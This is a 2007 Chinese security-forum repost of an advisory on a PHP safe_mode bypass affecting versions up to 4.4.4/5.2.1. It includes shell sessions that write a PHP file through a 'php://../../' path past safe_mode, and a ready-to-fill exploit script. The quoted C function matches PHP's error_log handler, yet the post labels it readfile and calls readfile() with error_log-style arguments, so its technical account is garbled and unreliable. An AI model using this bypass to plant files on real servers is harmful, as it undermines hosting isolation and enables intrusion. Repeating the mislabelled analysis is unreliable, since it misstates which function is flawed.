‹‹ 上一主题 | 下一主题 ››
发新话题
打印

PHP <= 4.4.4 / 5.2.1 / 5.1.6 readfile() Safe Mode Bypass Vulnerability

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3926 
精华
128 
积分
209876 
阅读权限
200 
性别
男 
在线时间
1109 小时 
注册时间
2007-10-23 
最后登录
2008-9-7 

资料收集奖 运营支持奖

楼主 发表于 2007-3-27 19:42  只看该作者

PHP <= 4.4.4 / 5.2.1 / 5.1.6 readfile() Safe Mode Bypass Vulnerability

复制内容到剪贴板
代码:
SecurityRisk : DEN
Remote Exploit : No
Local Exploit : Yes
Exploit Given : Yes
Credit : The-WolF-kSA
Date : 24.3.2007


Affected Software : PHP 5.2.1/ 5.1.6 / 4.4.4


[readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4]

Author: ThE-WoLf-KsA)
Date:
- -Written: 24.3.2007


- --- 0.Description ---


- --- 1. readfile() Safe Mode Bypass ---
readfile() function read throu, file or display your file or path. You can
read into
files. Issue is very simple. readfile() check safe_mode and
open_basedir in stream function. But isn't allowed use URL. And
problem exists in incorrect filename.

PHP5:
- -2013-2050---
PHPAPI int _php_readfile(int opt_err, char *message, char *opt,
char *headers TSRMLS_DC)
{
php_stream *stream = NULL;

switch (opt_err) {

case 1: /*send an email */
{
#if HAVE_SENDMAIL
if (!php_mail(opt, "PHP error_log message",
message, headers, NULL TSRMLS_CC)) {
return FAILURE;
}
#else
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option
not available!");
return FAILURE;
#endif
}
break;

case 2: /*send to an address */
php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP
option not available!");
return FAILURE;
break;

case 3: /*save to a file */
stream = php_stream_open_wrapper(opt, "a",
IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
if (!stream)
return FAILURE;
php_stream_write(stream, message, strlen(message));
php_stream_close(stream);
break;

default:
php_log_err(message TSRMLS_CC);
break;
}
return SUCCESS;
}
- -2013-2050---

Let's see to option 3.

- -2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL |
ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
- -2038 line---

Option "a", writte to file error or if file dosen't
exists, create new file.
Problem is because in php_stream_open_wrapper(), is defined
"IGNORE_URL".
IGNORE_URL turn off safe_mode if you use
"prefix://../../".

- -Example---
cxib# php -r &#39;readfile("<? echo \"cx\";
?>", 3, "/www/temp/sr.php");&#39;

Warning: readfile(): SAFE MODE Restriction in effect. The
script whose uid is 0 is not allowed to access /www/temp owned by
uid 80 in Command line code on line 1

Warning: readfile(/www/temp/sr.php): failed to open stream:
Invalid argument in Command line code on line 1
cxib# php -r &#39;readfile("<? echo \"cx\";
?>", 3, "php://../../www/temp/sr.php");&#39;
cxib# ls -la /www/temp/sr.php
- -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
cxib#
- -Example---

- --- 2. Exploit ---
<?php
$file=""; # FILENAME
readfile("<? echo \"cx\"; ?>", 3,
"php://../../".$file);
?>



- --- 4. Greets ---
SniPer_hex

- --- 5. Contact ---
[email]ThE-WolF-ksA@hotmail.com[/email]

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题